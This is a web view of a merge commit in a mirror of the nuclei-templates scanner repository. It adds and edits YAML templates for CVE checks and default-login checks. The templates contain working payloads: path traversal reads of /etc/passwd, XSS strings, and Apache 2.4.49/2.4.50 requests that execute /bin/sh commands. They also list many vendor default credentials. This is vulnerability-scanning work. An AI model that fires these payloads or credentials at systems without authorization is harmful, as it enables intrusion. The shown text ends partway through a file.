daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
Noam Rathaus 2021-10-12 15:45:23 +03:00
parent 59a6cef7fb d90a459115
commit 452b4c10ea
70 changed files with 1071 additions and 334 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
cves/2015/CVE-2015-2067.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-2067
info:
name: Magento Server Magmi Plugin - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
tags: cve,cve2015,lfi,magento
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
cves/2015/CVE-2015-2068.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-2068
info:
name: Magento Server Magmi Plugin - Cross Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
tags: cve,cve2015,magento,xss
requests:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

37
cves/2017/CVE-2017-12544.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2017-12544
info:
name: HPE System Management - XSS
author: divya_mudgal
severity: medium
description: Reflected Cross-site scripting (XSS) on HPE System Management
reference:
- https://seclists.org/fulldisclosure/2018/Mar/5
- https://nvd.nist.gov/vuln/detail/CVE-2017-12544
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-12544
cwe-id: CWE-79
tags: cve,cve2017,xss,hp
requests:
- method: GET
path:
- "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
matchers-condition: and
matchers:
- type: word
words:
- "var prodName = '';prompt`document.domain`;//';"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

32
cves/2018/CVE-2018-9205.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
author: daffainfo
severity: high
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
tags: cve,cve2018,lfi,drupal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2018-9205
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
cves/2020/CVE-2020-8641.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-8641
info:
name: Lotus Core CMS 1.0.1 - Local File Inclusion
author: 0x_Akoko
severity: high
tags: cve,cve202,lfi,lotus
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
- https://cxsecurity.com/issue/WLB-2020010234
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2020-8641
cwe-id: CWE-22
description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter."
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
cves/2021/CVE-2021-41773.yaml
View File

@ -1,29 +1,40 @@
id: CVE-2021-41773
info:
name: Apache 2.4.49 - Path Traversal
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
severity: critical
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
tags: cve,cve2021,lfi,apache,misconfig
- https://github.com/blasty/CVE-2021-41773
tags: cve,cve2021,lfi,rce,apache,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
- raw:
- |
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev
matchers-condition: or
matchers:
- type: regex
name: LFI
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- type: word
name: RCE
words:
- "CVE-2021-41773"

20
cves/2021/CVE-2021-42013.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-42013
info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729
author: nvn1729,0xd0ff9
severity: critical
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
reference:
@ -18,14 +18,24 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
- |+
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev
unsafe: true
matchers-condition: and
matchers-condition: or
matchers:
- type: regex
name: LFI
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- type: word
name: RCE
words:
- "CVE-2021-42013"

21
default-logins/UCMDB/ucmdb-default-login.yaml
View File

@ -7,16 +7,27 @@ info:
tags: ucmdb,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;"
body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB"
- raw:
- |
POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
Host: {{Hostname}}
customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB
attack: pitchfork
payloads:
username:
- diagnostics
password:
- admin
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "LWSSO_COOKIE_KEY"
part: header

27
default-logins/abb/cs141-default-login.yaml
View File

@ -17,23 +17,18 @@ requests:
Accept: application/json, text/plain, */*
Content-Type: application/json
{"userName":"admin","password":"cs141-snmp"}
{"userName":"{{user}}","password":"{{pass}}"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/json
{"userName":"engineer","password":"engineer"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/json
{"userName":"guest","password":"guest"}
attack: pitchfork
payloads:
user:
- admin
- engineer
- guest
pass:
- cs141-snmp
- engineer
- guest
stop-at-first-match: true
matchers-condition: and

21
default-logins/activemq/activemq-default-login.yaml
View File

@ -7,14 +7,23 @@ info:
tags: apache,activemq,default-login
requests:
- method: GET
path:
- '{{BaseURL}}/admin/'
headers:
Authorization: "Basic YWRtaW46YWRtaW4="
- raw:
- |
GET /admin/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- user
- admin
password:
- user
- admin
attack: pitchfork
matchers:
- type: word
words:
- 'Welcome to the Apache ActiveMQ Console of <b>'
- '<h2>Broker</h2>'
condition: and
condition: and

25
default-logins/aem/aem-default-login.yaml
View File

@ -4,7 +4,7 @@ info:
name: Adobe AEM Default Login
author: random-robbie
severity: critical
tags: aem,default-login,fuzz
tags: aem,default-login
requests:
- raw:
@ -15,35 +15,22 @@ requests:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/libs/granite/core/content/login.html
_charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true
_charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
attack: pitchfork
payloads:
rr_username:
aem_user:
- admin
- grios
- replication-receiver
- vgnadmin
- aparker@geometrixx.info
- jdoe@geometrixx.info
- james.devore@spambob.com
- matt.monroe@mailinator.com
- aaron.mcdonald@mailinator.com
- jason.werner@dodgit.com
rr_password:
aem_pass:
- admin
- password
- replication-receiver
- vgnadmin
- aparker
- jdoe
- password
- password
- password
- password
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
@ -53,7 +40,7 @@ requests:
- type: word
part: header
condition: and
words:
- login-token
- crx.default
condition: and

24
default-logins/alibaba/canal-default-login.yaml
View File

@ -7,21 +7,29 @@ info:
tags: alibaba,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/api/v1/user/login"
headers:
Content-Type: application/json
body: |
{"username":"admin","password":"123456"}
- raw:
- |
POST /api/v1/user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{user}}","password":"{{pass}}"}
attack: pitchfork
payloads:
user:
- admin
pass:
- 123456
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- 'data":{"token"'
- '"code":20000'
condition: and

16
default-logins/ambari/ambari-default-login.yaml
View File

@ -7,11 +7,17 @@ info:
tags: ambari,default-login
requests:
- method: GET
path:
- '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name'
headers:
Authorization: "Basic YWRtaW46YWRtaW4="
- raw:
- |
GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers:
- type: word
words:

8
default-logins/apache/airflow-default-login.yaml
View File

@ -21,8 +21,14 @@ requests:
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
username=airflow&password=airflow&_csrf_token={{csrf_token}}
username={{username}}&password={{password}}&_csrf_token={{csrf_token}}
payloads:
username:
- airflow
password:
- airflow
attack: pitchfork
extractors:
- type: regex
name: csrf_token

11
default-logins/apache/superset-default-login.yaml
View File

@ -21,11 +21,18 @@ requests:
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrff_token}}&username=admin&password=admin
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
extractors:
- type: regex
name: csrff_token
name: csrf_token
group: 1
part: body
internal: true

24
default-logins/arl/arl-default-login.yaml
View File

@ -7,23 +7,31 @@ info:
tags: arl,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/api/user/login"
headers:
Content-Type: application/json; charset=UTF-8
body: |
{"username":"admin","password":"arlpass"}
- raw:
- |
POST /api/user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
{"username":"{{username}}","password":"{{password}}"}
payloads:
username:
- admin
password:
- arlpass
attack: pitchfork
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"message": "success"'
- '"username": "admin"'
- '"type": "login"'
condition: and
- type: status
status:
- 200

28
default-logins/axis2/axis2-default-login.yaml
View File

@ -7,13 +7,27 @@ info:
tags: axis,apache,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/axis2-admin/login"
- "{{BaseURL}}/axis2/axis2-admin/login"
headers:
Content-Type: application/x-www-form-urlencoded
body: "userName=admin&password=axis2&submit=+Login+"
- raw:
- |
POST /axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginUsername={{username}}&loginPassword={{password}}
- |
POST /axis2/axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{username}}&password={{password}}&submit=+Login+
payloads:
username:
- admin
password:
- axis2
attack: pitchfork
matchers-condition: and
matchers:

8
default-logins/azkaban/azkaban-default-login.yaml
View File

@ -14,8 +14,14 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username=admin&password=admin
action=login&username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word

19
default-logins/chinaunicom/chinaunicom-default-login.yaml
View File

@ -7,15 +7,26 @@ info:
tags: chinaunicom,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/cu.html"
body: "frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password="
- raw:
- |
POST /cu.html HTTP/1.1
Host: {{Hostname}}
frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
attack: pitchfork
payloads:
username:
- CUAdmin
password:
- CUAdmin
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
words:
- "/menu.gch"

16
default-logins/dell/dell-idrac-default-login.yaml
View File

@ -6,11 +6,19 @@ info:
tags: dell,idrac,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/data/login"
- raw:
- |
POST /data/login HTTP/1.1
Host: {{Hostname}}
body: "user=root&password=calvin"
user={{username}}&password={{password}}
payloads:
username:
- root
password:
- calvin
attack: pitchfork
headers:
Content-Type: "application/x-www-form-urlencode"

11
default-logins/dell/dell-idrac9-default-login.yaml
View File

@ -11,8 +11,15 @@ requests:
- |
POST /sysmgmt/2015/bmc/session HTTP/1.1
Host: {{Hostname}}
User: "root"
Password: "calvin"
User: "{{username}}"
Password: "{{password}}"
payloads:
username:
- root
password:
- calvin
attack: pitchfork
matchers-condition: and
matchers:

17
default-logins/dell/emcecom-default-login.yaml
View File

@ -9,11 +9,18 @@ info:
tags: dell,emc,ecom,default-login
requests:
- method: GET
path:
- '{{BaseURL}}'
headers:
Authorization: Basic YWRtaW46IzFQYXNzd29yZA==
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- root
password:
- calvin
attack: pitchfork
matchers-condition: and
matchers:

23
default-logins/druid/druid-default-login.yaml
View File

@ -7,12 +7,25 @@ info:
tags: druid,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/druid/submitLogin"
- "{{BaseURL}}/submitLogin"
- raw:
- |
POST /druid/submitLogin HTTP/1.1
Host: {{Hostname}}
body: "loginUsername=admin&loginPassword=admin"
loginUsername={{username}}&loginPassword={{password}}
- |
POST /submitLogin HTTP/1.1
Host: {{Hostname}}
loginUsername={{username}}&loginPassword={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

9
default-logins/dvwa/dvwa-default-login.yaml
View File

@ -20,7 +20,14 @@ requests:
Cookie: PHPSESSID={{session}}; security=low
Connection: close
username=admin&password=password&Login=Login&user_token={{token}}
username={{username}}&password={{password}}&Login=Login&user_token={{token}}
payloads:
username:
- admin
password:
- password
attack: pitchfork
extractors:
- type: regex

9
default-logins/exacqvision/exacqvision-default-login.yaml
View File

@ -15,7 +15,14 @@ requests:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
action=login&u=admin&p=admin256
action=login&u={{username}}&p={{password}}
payloads:
username:
- admin
password:
- admin256
attack: pitchfork
matchers-condition: and
matchers:

9
default-logins/flir/flir-default-login.yaml
View File

@ -14,7 +14,14 @@ requests:
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
user_name=admin&user_password=admin
user_name={{username}}&user_password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

17
default-logins/frps/frp-default-login.yaml
View File

@ -8,11 +8,18 @@ info:
reference: https://github.com/fatedier/frp/issues/1840
requests:
- method: GET
path:
- "{{BaseURL}}/api/proxy/tcp"
headers:
Authorization: "Basic YWRtaW46YWRtaW4="
- raw:
- |
GET /api/proxy/tcp HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

6
default-logins/gitlab/gitlab-weak-login.yaml
View File

@ -17,13 +17,13 @@ requests:
Referer: {{BaseURL}}
content-type: application/json
{"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
{"grant_type":"password","username":"{{username}}","password":"{{password}}"}
payloads:
gitlab_password:
password:
- 12345
- 123456789
gitlab_user:
username:
- 1234
- admin

13
default-logins/glpi/glpi-default-login.yaml
View File

@ -1,4 +1,5 @@
id: glpi-default-login
info:
name: GLPI Default Login
author: andysvints
@ -20,10 +21,14 @@ requests:
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}
{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}
{{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}}
cookie-reuse: true
redirects: true
attack: pitchfork
payloads:
user:
- glpi
pass:
- glpi
extractors:
- type: regex
@ -50,11 +55,13 @@ requests:
regex:
- "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\""
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '<title>GLPI - Standard Interface</title>'
- type: status
status:
- 200

12
default-logins/grafana/grafana-default-login.yaml
View File

@ -19,15 +19,17 @@ requests:
Referer: {{BaseURL}}
content-type: application/json
{"user":"admin","password":"§grafana_password§"}
{"user":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
grafana_password:
- prom-operator
username:
- admin
- admin
attack: sniper
password:
- prom-operator
- admin
matchers-condition: and
matchers:

9
default-logins/guacamole/guacamole-default-login.yaml
View File

@ -16,7 +16,14 @@ requests:
Origin: {{Hostname}}
Referer: {{Hostname}}
username=guacadmin&password=guacadmin
username={{username}}&password={{password}}
payloads:
username:
- guacadmin
password:
- guacadmin
attack: pitchfork
matchers-condition: and
matchers:

13
default-logins/hongdian/hongdian-default-login.yaml
View File

@ -11,17 +11,26 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Authorization: Basic {{base64(username + ':' + password)}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
- |
GET / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Basic {{base64(username + ':' + password)}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
payloads:
username:
- guest
- admin
password:
- guest
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word

17
default-logins/hortonworks/smartsense-default-login.yaml
View File

@ -9,11 +9,18 @@ info:
tags: hortonworks,smartsense,default-login
requests:
- method: GET
path:
- '{{BaseURL}}/apt/v1/context'
headers:
Authorization: Basic YWRtaW46YWRtaW4=
- raw:
- |
GET /apt/v1/context HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

8
default-logins/hp/hp-switch-default-login.yaml
View File

@ -14,7 +14,13 @@ requests:
POST /htdocs/login/login.lua HTTP/1.1
Host: {{Hostname}}
username=admin&password=
username={{username}}&password=
payloads:
username:
- admin
attack: sniper
matchers-condition: and
matchers:

9
default-logins/ibm/ibm-storage-default-credential.yaml
View File

@ -14,7 +14,14 @@ requests:
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
j_username=admin&j_password=admin&continue=&submit=submit+form
j_username={{username}}&j_password={{password}}&continue=&submit=submit+form
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

14
default-logins/idemia/idemia-biometrics-default-login.yaml
View File

@ -9,11 +9,17 @@ info:
tags: idemia,biometrics,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/cgi-bin/login.cgi'
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
body: password=12345
password={{password}}
payloads:
password:
- 12345
attack: sniper
matchers-condition: and
matchers:

9
default-logins/iptime/iptime-default-login.yaml
View File

@ -13,7 +13,14 @@ requests:
Host: {{Hostname}}
Referer: {{BaseURL}}/sess-bin/login_session.cgi
username=admin&passwd=admin
username={{username}}&passwd={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

25
default-logins/jenkins/jenkins-default.yaml
View File

@ -18,21 +18,22 @@ requests:
Content-Type: application/x-www-form-urlencoded
Cookie: {{cookie}}
j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
- |
POST /j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: {{cookie}}
j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: {{cookie}}
attack: pitchfork
payloads:
username:
- admin
- jenkins
password:
- admin
- password
extractors:
- type: regex
name: cookie
@ -44,7 +45,7 @@ requests:
req-condition: true
matchers:
- type: dsl
condition: and
dsl:
- 'contains(body_4, "/logout")'
- 'contains(body_4, "Dashboard [Jenkins]")'
condition: and
- 'contains(body_3, "/logout")'
- 'contains(body_3, "Dashboard [Jenkins]")'

27
default-logins/minio/minio-default-login.yaml
View File

@ -7,23 +7,20 @@ info:
tags: default-login,minio
requests:
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
- raw:
- |
POST /minio/webrpc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
headers:
Content-Type: application/json
{"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
headers:
Content-Type: application/json
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
payloads:
username:
- minioadmin
password:
- minioadmin
attack: pitchfork
matchers-condition: and
matchers:

20
default-logins/nagios/nagios-default-login.yaml
View File

@ -6,17 +6,27 @@ info:
tags: nagios,default-login
reference: https://www.nagios.org
requests:
- method: GET
path:
- "{{BaseURL}}/nagios/side.php"
headers:
Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
- raw:
- |
GET /nagios/side.php HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- nagiosadmin
- root
password:
- nagiosadmin
- nagiosxi
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Current Status'

9
default-logins/nexus/nexus-default-login.yaml
View File

@ -14,7 +14,14 @@ requests:
X-Nexus-UI: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
username={{base64(username)}}&password={{base64(password)}}
payloads:
username:
- admin
password:
- admin123
attack: pitchfork
matchers-condition: and
matchers:

22
default-logins/nps/nps-default-login.yaml
View File

@ -7,13 +7,21 @@ info:
tags: nps,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/login/verify"
body: "username=admin&password=123"
headers:
Content-Type: application/x-www-form-urlencoded
Referer: "{{Hostname}}/login/index"
- raw:
- |
POST /login/verify HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{Hostname}}/login/index
username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- 123
attack: pitchfork
matchers-condition: and
matchers:

21
default-logins/ofbiz/ofbiz-default-login.yaml
View File

@ -7,12 +7,21 @@ info:
tags: ofbiz,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/control/login'
headers:
Content-Type: application/x-www-form-urlencoded
body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
- raw:
- |
POST /control/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y
payloads:
username:
- admin
password:
- ofbiz
attack: pitchfork
matchers:
- type: word
words:

11
default-logins/oracle/businessintelligence-default-login.yaml
View File

@ -19,13 +19,20 @@ requests:
<soapenv:Header/>
<soapenv:Body>
<rep:createSession soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="xsd:string">Administrator</username>
<password xsi:type="xsd:string">Administrator</password>
<username xsi:type="xsd:string">{{username}}</username>
<password xsi:type="xsd:string">{{password}}</password>
<domain xsi:type="xsd:string">bi</domain>
</rep:createSession>
</soapenv:Body>
</soapenv:Envelope>
payloads:
username:
- Administrator
password:
- Administrator
attack: pitchfork
matchers-condition: and
matchers:
- type: status

17
default-logins/paloalto/panos-default-login.yaml
View File

@ -9,11 +9,20 @@ info:
tags: paloalto,panos,default-login
requests:
- method: POST
path:
- '{{BaseURL}}/php/login.php'
- raw:
- |
POST /php/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
body: user=admin&passwd=admin&challengePwd=&ok=Login
user={{username}}&passwd={{password}}&challengePwd=&ok=Login
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

11
default-logins/panabit/panabit-default-login.yaml
View File

@ -19,15 +19,22 @@ requests:
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="username"
Content-Disposition: form-data; name="{{username}}"
admin
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="password"
Content-Disposition: form-data; name="{{password}}"
panabit
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
payloads:
username:
- username
password:
- password
attack: pitchfork
matchers-condition: and
matchers:
- type: word

19
default-logins/rabbitmq/rabbitmq-default-login.yaml
View File

@ -7,11 +7,20 @@ info:
tags: rabbitmq,default-login
requests:
- method: GET
path:
- "{{BaseURL}}/api/whoami"
headers:
Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q="
- raw:
- |
GET /api/whoami HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- guest
password:
- guest
attack: pitchfork
matchers-condition: and
matchers:
- type: word

7
default-logins/ricoh/ricoh-weak-password.yaml
View File

@ -14,7 +14,12 @@ requests:
Host: {{Hostname}}
Cookie: cookieOnOffChecker=on;
wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open=
payloads:
username:
- admin
attack: pitchfork
matchers-condition: and
matchers:

9
default-logins/rockmongo/rockmongo-default-login.yaml
View File

@ -14,7 +14,14 @@ requests:
Content-Type: application/x-www-form-urlencoded
Referer: {{Hostname}}/index.php?action=login.index
more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:

20
default-logins/samsung/samsung-wlan-default-login.yaml
View File

@ -8,18 +8,28 @@ info:
tags: samsung,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/main.ehp"
body: "httpd;General;lang=en&login_id=root&login_pw=sweap12~"
- raw:
- |
POST /main.ehp HTTP/1.1
Host: {{Hostname}}
